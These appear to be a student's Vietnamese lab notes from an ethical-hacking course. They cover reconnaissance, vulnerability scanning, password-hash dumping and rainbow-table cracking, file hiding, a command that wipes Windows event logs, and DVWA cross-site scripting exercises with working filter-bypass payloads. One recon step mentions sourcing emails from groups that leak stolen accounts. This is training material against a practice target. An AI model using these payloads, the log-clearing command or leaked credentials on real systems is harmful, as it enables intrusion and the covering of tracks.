# Module 2
## Lab 2-1
search email xuất hiện trên linkedin.com + chrome email extractor extension:
Tìm từ các group leak acc steal được:
## Lab 2-2
IP:
DNS Server:
`ns6.synerfy.vn`
Hệ điều hành:
Khả năng cao được host bằng linux
lịch sử update: *search ko ra* :confused:
các công nghệ sử dụng:
*Sử dụng Wappalyzer chrome extension để lấy thông tin*
Các port mở, dịch vụ:
Thông tin khác:
- subdomain:
- robots.txt:
## Lab 2-3
Tìm các thiết bị IOT của tổ chức:
# Module 5
## Lab 1
máy win7 chứa lỗ hổng:
Scan bằng máy kali có cài nessus:
*report sau khi quét xong*
## lab 2
máy win7:
máy kali:
# Module 6
## lab1
Đã search thử với router, not work! router đã đổi mật khẩu thay vì sử dụng mặc định.
## Lab2
Đã xem cách tấn công, tuy nhiên ko có card wifi support monitor mode. Không thực nghiệm được.
## lab3
tạo mật khẩu cho kiểu tấn công Rainbow Table từ công cụ Winrtgen. Chỉ đơn giản là config tool, chạy tool và đợi. Một vài config mặc định thì mình lên mạng tải file đã được tạo sẵn cho lẹ. muốn custom thì tự chạy.
Giao diện chương trình:
chọn add table:
- Hash: Loại mã hóa mà chúng tôi muốn tạo bảng Rainbow. Ví dụ: MD5, MD4, SHA1, v.v.
- Min Len: Cho phép người dùng đặt độ dài tối thiểu của mật khẩu.
- Max Len: Cho phép người dùng đặt độ dài tối đa của mật khẩu.
- Index: Nó phân biệt bảng này với bảng khác.
- Chain length: It shows the number of hashes that will be present in a single chain. As we have discussed earlier that table is formed using START and END. If the length of chains is higher the success rate will also be higher.
- Chain Count: It represents the number of chains in a file for that particular Rainbow Table. If we generate a Rainbow table with a high chain count then it will take a large amount of storage and time to generate.
- No. of Tables: Nó hiển thị số lượng tệp được tạo cho Bảng Rainbow hiện tại.
- Charset: Đây là bộ ký tự sẽ được xem xét để tạo Bảng Cầu Vồng. Ví dụ: chữ và số, dấu cách chữ và số, v.v.
Nhấn start và công việc tiếp theo là chờ đợi:
## lab 4
Crack password user with Pwdump7
Dump hash
Tiếp đến là các bước load file table, load hash rồi chạy tool. Tuy nhiên, các file rainbow table nếu không gen rất lâu, thì cũng rất tốn dung lượng ổ cứng. Thứ mà mình ko có đủ. Nên give up và xem video demo của người khác thôi.
[demo](https://www.youtube.com/watch?v=a2pyRYLE2Iw&ab_channel=RainbowCrackProject)
## lab 5
Giấu file bằng ADS, sau khi giấu nhận thấy dung lượng tệp tin ahihi.txt ko thay đổi. tiến hành xóa file cần giấu.
Đã xóa. Tiếp theo tạo symlink
Mở symlink:
## Lab6
Nhìn y hệt, nma không:
Lấy lại thông điệp:
## lab 7
Stego với ảnh, chỉ là chạy tool.
## lab8
clearing log
```
del /s /q %programdata%\microsoft\eventv~1\extern~1
```
hoặc dùng event viewer xóa thủ công
# Module11
## 5.4
### Reflected XSS
Sau khi điền tên và xác nhận:
Thử với payload `<script>alert('test')</script>`
Không thành công, do input bị filter `<script>`. Sử dụng thẻ `<img>`: `<img src=x onerror=alert("test")>`
Lấy sessionid:
### DOM based XSS
`/vulnerabilities/xss_d/?default=Spanish`
script của trang web:
```javascript!
if (document.location.href.indexOf("default=") >= 0) {
var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
document.write("<option value='" + lang + "'>" + decodeURI(lang) + "</option>");
document.write("<option value='' disabled='disabled'>----</option>");
}
document.write("<option value='English'>English</option>");
document.write("<option value='French'>French</option>");
document.write("<option value='Spanish'>Spanish</option>");
document.write("<option value='German'>German</option>");
```
Thử thay url thành
`/vulnerabilities/xss_d/?default=test`, không có gì được thay đổi. Các option cũ vẫn giữ nguyên.
. Có thể phía backend có kiểm tra giá trị của default.
Source của trang:
```php!
<?php
// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
# White list the allowable languages
switch ($_GET['default']) {
case "French":
case "English":
case "German":
case "Spanish":
# ok
break;
default:
header ("location: ?default=English");
exit;
}
}
?>
```
Đầu tiên kiểm tra xem có bất kỳ đầu vào nào được người dùng cung cấp hay không. Tiếp theo chứa 4 ngôn ngữ được phép hoặc nằm trong whitelist bên trong câu lệnh switch. Và cuối cùng, nếu đầu vào là bất kỳ thứ gì khác thì nó sẽ chuyển hướng đến vị trí ?default=English. Đó là lý do tại sao bất cứ khi nào chúng ta cố gắng nhập một chuỗi khác các giá trị được cho phép, nó sẽ tự set thành English.
**Bypass**
- Sử dụng '&' để bypass switch case, sau đó chèn thêm payload phía sau.
- Payload sau đó sẽ được chèn vào bên trong thẻ `<select></select>` nên sử dụng </select> để đóng thẻ này và chèn thẻ mình muốn vào.
`English&</select><img src=x onerror=alert("test")>`
### store xss
Tạo comment với payload xss, nhưng phía backend lọc mất thẻ `<script>`. Thử với các thẻ khác như `<h1></h1>`
Như vậy có thể backend chỉ filter thẻ script, thử payload với thẻ img:
`<img src="x" onerror="alert('test')" />`
Kiểm tra source phía backend, thì ở name input chỉ replace thẻ `script`
```php!
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
```
Sign in with Wallet
Connect another wallet